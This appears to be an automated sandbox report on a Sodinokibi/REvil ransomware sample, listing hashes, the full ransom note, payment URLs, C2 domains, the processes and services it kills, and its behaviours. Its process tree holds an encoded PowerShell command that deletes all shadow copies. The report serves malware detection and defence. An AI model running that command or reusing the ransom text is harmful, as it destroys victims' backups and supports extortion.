Analysis

  • max time kernel
    131s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:08

General

  • Target

    c3673d64eeafc5efafb3a756ac44f72785c28fb29912f61d0640969ec85d0afd.exe

  • Size

    391KB

  • MD5

    3e90448b831a31a59f12426668824b63

  • SHA1

    5ef4d8f05886bc4e5d4f609bcb0d31f8fc620084

  • SHA256

    c3673d64eeafc5efafb3a756ac44f72785c28fb29912f61d0640969ec85d0afd

  • SHA512

    bd286065f98d6624597ed8c25bdc487acf72fd742a29dcc6e176cd0dd783ea2f0d378ffcc435cf655f10c75232af66bb95d1d3fe8e8452058965ecbc429ee495

Malware Config

Extracted

Path

C:\5z3k8w-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 5z3k8w. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0ED9DD8958A65B5F 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/0ED9DD8958A65B5F Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: 9rmUeQKXedqeTLymrGHEV6fK1pk4RDL1kcVwTTLHQCGT5GvBKwntH/+bF74zzM5e fvDRbetGfTi1jWdt8HW0BWOqI0XUNCeaXrCpSEgr3WS0xFOJsE4B29iYW+UUmikc B3D16mMtLpJ+uN7PLnrvHamffXUXILq3mtfRVcT3KJ35km8EPc6Y7v6/OsMWQ4MN cqb0SX8HfgOc0w24McMpEtuovVj0TX1KjidKpfpKQHb99C8I/6tWgTDZxgj34AzO ZnnxOo0KHxFZ8RInTtagSN1GolIviuKcGSOvtvU9gpfVjk5YzetkhQNwAi6wdMFX l5b+H8fjkXfjrZmvpCtcqGRGb36hjuzz2ZZMxDZW+xA9gILQrfR6ZpJhltuAF49/ sOtpToyQ+cn6uZXx9zRSz0deMlYDBvelElGjMH+CHk7UUzz4KNN0Dx3KDCIucG57 pYSRlQzbRt8/xjFxHoyfojfWdxkyfVniq3TyCFE+kndm8PuXwOYa+8D+p1ZkLjQz SdDue9X4FZwKk4BKzHwhXuo13czMJ92Wy6TZqqIA7y8pbqplNOtY44tTQYq4Ex7C 1UUi+bZXK3juQqp/PYHaDYs6vQk1O6qaVDvYVElp/U0rj6ckjX1fvxvJWXu3HAN4 o7GBOv66RZLu0NnKMRzh9LB4FjW+1lHMdIQ0fPmcm/CalddasdwUP4Rz6hhZF3Yl PGbF8bnBQBdvm49QN73pwHEZj5SAQMfd4oA6b1qDItwV4AJz7disOw1awP1+2GUk cBQagG1Rdw7EkfNnQGjZEBCoOd1hqSUAERtsSCeZmxQ6Fus3ZYFGmoacXxXdjvwG taKKeDu0GK8ifbObvV8T/OuvS7dYOLNFoiD0UgPhHWDXVPx/b6NkWm6ephF0pKsB XUrRDsITyiKN6ZGx0TyQnthg3QjEqzpbXHQH2Ldht2jMG7kAEQ3Sz9RMtojSsIjt FbxWOctbbwlFUuXHUxXoqFuhdph2EaZyOShi8APFh+sO8dW8fT4yoTWZhY5n9Whg MImr2vyi+rnRDQ7Xqt33uFqzFQNmYGKu1CrWV6Fq0T6qsjpSzFZU7ehpEfKAR/bb j3hFkljLbzn07NBXC5CEOVDnvEoqijyny6MvN3oBr5L6thgnvmL6R3i6zxEYKSyT Qp58y74Vf4kNGHl31v2qArx8keQT7KfOtu+oABX9iM3dt6JM/5Twa2YDqN6GqZO2 jmlRdzLrz//4Ktv27CNpiKFtHP4+MNFt7/cW4C02k26mWQkkhbREKdRCQQ0sPJ46 XuQFcVgUetzclEKOQZxxpG3rAWh3HAbM Extension name: 5z3k8w ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0ED9DD8958A65B5F

http://decryptor.cc/0ED9DD8958A65B5F

Extracted

Family

sodinokibi

Botnet

$2a$10$R6jfdY.02Ns/TL60z.A74O5Dw8.5EqXA63YzUP5X2NSO0l.4y0Gfa

Campaign

1428

C2

firstpaymentservices.com

krcove-zily.eu

softsproductkey.com

naturavetal.hr

corelifenutrition.com

leda-ukraine.com.ua

beaconhealthsystem.org

acomprarseguidores.com

extraordinaryoutdoors.com

mardenherefordshire-pc.gov.uk

stopilhan.com

triggi.de

anteniti.com

aunexis.ch

boosthybrid.com.au

bee4win.com

gadgetedges.com

tandartspraktijkheesch.nl

8449nohate.org

simoneblum.de

Attributes
  • net

    true

  • pid

    $2a$10$R6jfdY.02Ns/TL60z.A74O5Dw8.5EqXA63YzUP5X2NSO0l.4y0Gfa

  • prc

    excel

    mydesktopservice

    sqlwriter

    ocomm

    powerpnt

    oracle

    mydesktopqos

    ocautoupds

    ocssd

    encsvc

    mysqld_opt

    msaccess

    visio

    agntsvc

    winword

    sqlservr

    tbirdconfig

    wordpad

    xfssvccon

    msftesql

    firefoxconfig

    dbsnmp

    onenote

    thunderbird

    outlook

    isqlplussvc

    dbeng50

    mspub

    thebat64

    sqbcoreservice

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. 
From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    1428

  • svc

    vss

    mepocs

    veeam

    svc$

    backup

    sophos

    memtas

    sql

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 36 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c3673d64eeafc5efafb3a756ac44f72785c28fb29912f61d0640969ec85d0afd.exe
    "C:\Users\Admin\AppData\Local\Temp\c3673d64eeafc5efafb3a756ac44f72785c28fb29912f61d0640969ec85d0afd.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:544
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1244
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1496

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/524-54-0x00000000751B1000-0x00000000751B3000-memory.dmp

    Filesize

    8KB

  • memory/524-61-0x0000000000E60000-0x0000000000E85000-memory.dmp

    Filesize

    148KB

  • memory/544-55-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

    Filesize

    8KB

  • memory/544-56-0x000007FEF2660000-0x000007FEF31BD000-memory.dmp

    Filesize

    11.4MB

  • memory/544-57-0x000000001B7E0000-0x000000001BADF000-memory.dmp

    Filesize

    3.0MB

  • memory/544-58-0x00000000029A4000-0x00000000029A7000-memory.dmp

    Filesize

    12KB

  • memory/544-59-0x00000000029AB000-0x00000000029CA000-memory.dmp

    Filesize

    124KB